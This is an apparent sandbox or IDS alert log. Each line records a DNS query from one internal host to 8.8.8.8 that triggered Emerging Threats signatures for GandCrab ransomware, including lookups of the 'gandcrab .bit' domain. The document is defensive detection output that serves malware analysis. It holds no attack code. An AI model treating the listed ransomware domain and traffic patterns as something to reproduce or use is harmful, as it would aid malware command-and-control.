192.168.2.38.8.8.865464532829500 09/01/22-00:03:37.331573	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65464	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.863566532026737 09/01/22-00:02:17.069143	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	63566	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.849203532026737 09/01/22-00:02:46.656883	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	49203	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864972532829500 09/01/22-00:03:05.639386	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64972	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853051532829498 09/01/22-00:02:15.015452	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53051	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851995532026737 09/01/22-00:02:26.294405	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51995	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851107532829500 09/01/22-00:03:01.623107	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	51107	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864969532829500 09/01/22-00:02:44.846895	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64969	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852113532026737 09/01/22-00:03:20.304409	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52113	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858121532829498 09/01/22-00:02:27.883460	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	58121	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857707532829500 09/01/22-00:01:42.707644	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	57707	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861420532829498 09/01/22-00:02:03.023139	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61420	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860772532829498 09/01/22-00:01:45.515640	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60772	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859379532829500 09/01/22-00:02:48.360270	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	59379	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860420532829498 09/01/22-00:03:32.361100	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60420	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858306532026737 09/01/22-00:02:34.518930	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	58306	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857136532829498 09/01/22-00:01:34.170593	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	57136	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.863692532829498 09/01/22-00:03:21.709351	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	63692	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851110532829500 09/01/22-00:03:01.687030	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	51110	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855651532829498 09/01/22-00:03:19.239137	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55651	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861187532829498 09/01/22-00:02:52.669551	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61187	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850789532026737 09/01/22-00:02:43.405655	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50789	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864126532829498 09/01/22-00:02:44.367092	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64126	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.856045532829500 09/01/22-00:01:38.479108	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56045	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.849876532829500 09/01/22-00:02:36.017097	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	49876	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853430532829498 09/01/22-00:02:18.389778	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53430	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864275532829498 09/01/22-00:03:00.076893	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64275	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852746532026737 09/01/22-00:03:24.060420	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52746	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865199532829500 09/01/22-00:02:04.790776	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65199	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855643532829498 09/01/22-00:01:41.349610	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55643	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865322532026737 09/01/22-00:01:43.838373	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	65322	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857389532829500 09/01/22-00:02:53.228134	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	57389	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852457532026737 09/01/22-00:03:02.822494	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52457	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859766532026737 09/01/22-00:03:34.053456	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59766	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850094532026737 09/01/22-00:03:38.722516	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50094	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.863689532829498 09/01/22-00:03:21.642301	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	63689	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864828532829500 09/01/22-00:02:24.814616	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64828	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.862427532026737 09/01/22-00:03:13.168037	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62427	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858485532829500 09/01/22-00:03:30.012594	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58485	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860586532026737 09/01/22-00:01:27.526553	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	60586	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860648532829498 09/01/22-00:03:25.320562	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60648	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850231532026737 09/01/22-00:02:54.755739	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50231	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859831532829500 09/01/22-00:02:55.995864	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	59831	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857138532829498 09/01/22-00:01:34.214783	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	57138	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865465532829500 09/01/22-00:03:37.351949	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65465	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859641532026737 09/01/22-00:01:39.990388	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59641	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859638532026737 09/01/22-00:01:39.931325	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59638	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.854435532829498 09/01/22-00:03:36.023381	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54435	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860818532829500 09/01/22-00:03:08.745097	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	60818	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857576532829498 09/01/22-00:01:53.290249	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	57576	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.849171532829500 09/01/22-00:02:32.489443	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	49171	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851144532829498 09/01/22-00:01:24.145242	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51144	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852115532026737 09/01/22-00:03:20.348262	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52115	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.856620532026737 09/01/22-00:02:49.146584	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	56620	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851109532829500 09/01/22-00:03:01.665772	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	51109	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864379532829500 09/01/22-00:03:19.992460	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64379	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864599532829498 09/01/22-00:02:22.089885	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64599	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860821532829500 09/01/22-00:03:08.846909	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	60821	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.849205532026737 09/01/22-00:02:46.696702	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	49205	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.849878532829500 09/01/22-00:02:36.053729	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	49878	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853846532829498 09/01/22-00:01:59.423880	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53846	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860091532829500 09/01/22-00:02:16.509694	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	60091	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859377532829500 09/01/22-00:02:48.283085	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	59377	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859824532026737 09/01/22-00:02:19.994370	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59824	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864607532829500 09/01/22-00:02:41.921899	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64607	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855249532829498 09/01/22-00:03:03.506251	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55249	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864380532829500 09/01/22-00:03:20.011368	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64380	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850092532026737 09/01/22-00:03:38.678470	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50092	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853272532829498 09/01/22-00:02:55.282821	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53272	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857392532829500 09/01/22-00:02:53.296910	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	57392	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858916532829500 09/01/22-00:03:18.060823	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58916	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853053532829498 09/01/22-00:02:15.057233	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53053	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864826532829500 09/01/22-00:02:24.770961	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64826	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853625532026737 09/01/22-00:02:01.788642	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53625	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851596532026737 09/01/22-00:03:26.954769	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51596	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.862435532026737 09/01/22-00:02:57.512287	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62435	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853852532026737 09/01/22-00:01:50.489647	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53852	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.862429532026737 09/01/22-00:03:13.209944	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62429	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860584532026737 09/01/22-00:01:27.482735	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	60584	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864124532829498 09/01/22-00:02:44.327136	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64124	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861189532829498 09/01/22-00:02:52.764321	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61189	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.849168532829500 09/01/22-00:02:32.423642	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	49168	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.863451532829498 09/01/22-00:02:35.516825	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	63451	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850625532026737 09/01/22-00:03:18.697259	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50625	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.854286532829500 09/01/22-00:03:33.715891	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54286	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860769532829498 09/01/22-00:01:45.451637	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60769	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852744532026737 09/01/22-00:03:24.019183	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52744	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855641532829498 09/01/22-00:01:41.302395	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55641	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853469532829500 09/01/22-00:02:00.624524	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	53469	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860770532829498 09/01/22-00:01:45.473540	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60770	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853470532829500 09/01/22-00:02:00.646017	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	53470	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865324532026737 09/01/22-00:01:43.883100	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	65324	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853851532026737 09/01/22-00:01:50.267332	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53851	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.862433532026737 09/01/22-00:02:57.467935	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62433	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859584532026737 09/01/22-00:02:11.726579	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59584	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860475532829498 09/01/22-00:02:47.139274	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60475	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864123532829498 09/01/22-00:02:44.306860	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64123	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858483532829500 09/01/22-00:03:29.383909	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58483	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.856618532026737 09/01/22-00:02:49.105935	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	56618	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855247532829498 09/01/22-00:03:03.466197	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55247	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861362532829498 09/01/22-00:03:28.520063	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61362	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861129532829498 09/01/22-00:03:15.922110	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61129	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857574532829498 09/01/22-00:01:53.251460	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	57574	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864597532829498 09/01/22-00:02:22.051454	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64597	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858303532026737 09/01/22-00:02:34.435886	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	58303	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865387532026737 09/01/22-00:02:38.660218	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	65387	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853274532829498 09/01/22-00:02:55.325848	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53274	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851594532026737 09/01/22-00:03:26.907030	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51594	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.863565532026737 09/01/22-00:02:17.049623	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	63565	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850627532026737 09/01/22-00:03:18.737468	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50627	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858124532829498 09/01/22-00:02:27.993076	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	58124	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850786532026737 09/01/22-00:02:43.346779	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50786	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850233532026737 09/01/22-00:02:54.805593	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50233	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.854287532829500 09/01/22-00:03:33.736226	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54287	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864605532829500 09/01/22-00:02:41.882665	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64605	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864604532829500 09/01/22-00:02:41.862105	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64604	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855246532829498 09/01/22-00:03:03.448041	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55246	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855953532829500 09/01/22-00:03:25.594151	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	55953	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858484532829500 09/01/22-00:03:29.402067	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58484	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857139532829498 09/01/22-00:01:34.235761	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	57139	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859435532026737 09/01/22-00:01:57.617695	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59435	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.863564532026737 09/01/22-00:02:17.026690	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	63564	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852958532829500 09/01/22-00:01:25.347118	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	52958	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860092532829500 09/01/22-00:02:16.532570	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	60092	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.863690532829498 09/01/22-00:03:21.664385	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	63690	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858304532026737 09/01/22-00:02:34.463044	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	58304	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855459532829498 09/01/22-00:03:07.276022	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55459	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860476532829498 09/01/22-00:02:47.160135	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60476	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865110532829500 09/01/22-00:01:46.934130	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65110	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.863449532829498 09/01/22-00:02:35.476503	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	63449	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852960532829500 09/01/22-00:01:25.385522	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	52960	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857390532829500 09/01/22-00:02:53.250639	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	57390	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857573532829498 09/01/22-00:01:53.226527	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	57573	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865514532829500 09/01/22-00:02:19.450712	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65514	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861131532829498 09/01/22-00:03:15.960645	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61131	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851141532829498 09/01/22-00:01:24.068248	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51141	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853052532829498 09/01/22-00:02:15.036327	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53052	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861128532829498 09/01/22-00:03:15.903464	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61128	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852745532026737 09/01/22-00:03:24.040007	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52745	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.854156532829498 09/01/22-00:02:39.730598	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54156	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857709532829500 09/01/22-00:01:42.750967	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	57709	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861363532829498 09/01/22-00:03:28.538480	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61363	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853308532829500 09/01/22-00:01:54.898418	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	53308	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860585532026737 09/01/22-00:01:27.503002	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	60585	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860771532829498 09/01/22-00:01:45.495695	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60771	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860422532829498 09/01/22-00:03:32.403375	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60422	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850093532026737 09/01/22-00:03:38.699985	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50093	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853041532026737 09/01/22-00:03:06.319112	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53041	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851994532026737 09/01/22-00:02:26.273853	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51994	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858917532829500 09/01/22-00:03:18.082512	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58917	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864827532829500 09/01/22-00:02:24.792802	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64827	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860820532829500 09/01/22-00:03:08.828384	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	60820	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851997532026737 09/01/22-00:02:26.333413	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51997	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861188532829498 09/01/22-00:02:52.691629	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61188	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859832532829500 09/01/22-00:02:56.017085	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	59832	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864600532829498 09/01/22-00:02:22.108885	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64600	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855640532829498 09/01/22-00:01:41.280696	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55640	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855462532829498 09/01/22-00:03:07.346617	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55462	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859639532026737 09/01/22-00:01:39.951734	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59639	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855653532829498 09/01/22-00:03:19.277165	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55653	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857826532829500 09/01/22-00:03:22.956962	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	57826	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853847532829498 09/01/22-00:01:59.444336	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53847	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851108532829500 09/01/22-00:03:01.644612	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	51108	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852459532026737 09/01/22-00:03:02.900983	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52459	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864381532829500 09/01/22-00:03:20.034172	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64381	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853626532026737 09/01/22-00:02:01.814516	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53626	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859823532026737 09/01/22-00:02:19.973756	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59823	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851892532026737 09/01/22-00:03:31.996527	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51892	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.856621532026737 09/01/22-00:02:49.211680	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	56621	53	192.168.2.3	8.8.8.8
